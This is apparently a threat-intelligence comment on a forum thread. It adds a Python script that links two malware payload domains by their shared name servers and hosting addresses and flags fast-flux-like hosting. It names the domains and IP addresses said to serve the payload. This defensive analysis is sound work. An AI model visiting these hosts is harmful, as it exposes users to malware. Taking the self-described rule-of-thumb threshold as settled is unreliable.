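The two payload domains in this thread, saprolaunimaxim.ru and sumatranajuge.ru, advertise the same six name-server addresses, and two of sumatranajuge.ru's four A records are the addresses NotBuyingIt reported as still serving the saprolaunimaxim.ru payload. Shared name servers and shared hosting addresses are the usual way to tie fast-flux domains to one operator. The script below is an added example, not code from the posts, that makes that pivot over the records quoted in the thread. The data is transcribed from the posts (the seventh name server 184.106.189.124 is included for saprolaunimaxim.ru because NotBuyingIt reported it, which is why the overlap is six and not seven); the country tags are Red Dwarf's annotations; the threshold for calling a domain "flux-like" is my own rule of thumb and not something any poster stated.

```python
import ipaddress
from itertools import combinations

# Name-server addresses per domain, transcribed from the whois output in the thread.
NS_IPS = {
    "saprolaunimaxim.ru": {
        "62.213.64.161", "62.76.189.62", "85.214.204.32",
        "50.57.88.200", "41.66.137.155", "50.57.43.49",
        "184.106.189.124",  # seventh NS reported earlier by NotBuyingIt, since dropped
    },
    "sumatranajuge.ru": {
        "62.213.64.161", "62.76.189.62", "85.214.204.32",
        "50.57.88.200", "41.66.137.155", "50.57.43.49",
    },
}

# A records per domain, transcribed from the posts (saprolaunimaxim.ru's two
# are the "old" records NotBuyingIt said still hosted the payload).
A_RECORDS = {
    "saprolaunimaxim.ru": {"173.224.209.130", "78.83.233.242"},
    "sumatranajuge.ru": {"173.224.209.130", "213.17.171.186", "78.83.233.242", "110.234.176.99"},
}

# Country per A record, from Red Dwarf's annotations in the thread.
A_COUNTRY = {
    "173.224.209.130": "US",
    "213.17.171.186": "PL",
    "78.83.233.242": "BG",
    "110.234.176.99": "IN",
}


def shared_infrastructure(ns_ips, a_records):
    """For every pair of domains, the name-server and A-record addresses they
    have in common.  Pairs with nothing in common are left out."""
    domains = sorted(set(ns_ips) | set(a_records))
    links = {}
    for d1, d2 in combinations(domains, 2):
        ns = ns_ips.get(d1, set()) & ns_ips.get(d2, set())
        a = a_records.get(d1, set()) & a_records.get(d2, set())
        if ns or a:
            links[(d1, d2)] = {"ns": ns, "a": a}
    return links


def flux_indicators(domain, a_records, country_of, min_ips=3, min_countries=3):
    """Distinct A records for a domain and the countries they sit in.  The
    thresholds are a hypothetical rule of thumb for this example: several
    addresses spread over unrelated networks is what fast flux looks like."""
    # ip_address() rejects malformed strings early instead of counting them.
    ips = {str(ipaddress.ip_address(ip)) for ip in a_records.get(domain, ())}
    countries = {country_of[ip] for ip in ips if ip in country_of}
    return {
        "ips": sorted(ips),
        "countries": sorted(countries),
        "flux_like": len(ips) >= min_ips and len(countries) >= min_countries,
    }


if __name__ == "__main__":
    for pair, link in shared_infrastructure(NS_IPS, A_RECORDS).items():
        print(pair, "shared NS:", sorted(link["ns"]), "shared A:", sorted(link["a"]))
    for domain in A_RECORDS:
        print(domain, flux_indicators(domain, A_RECORDS, A_COUNTRY))
```

The pivot is what makes a new .ru domain with a fresh registration date actionable: the name-server addresses and the payload hosts outlive any single domain, so blocking or watching those, rather than the domain, carries over to the next one the operator registers. The whois "NOT DELEGATED" state with an NXDOMAIN from public resolvers, alongside the fact that the old A records still served the payload, is the same point from the other side: the domain is disposable, the hosting is not.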
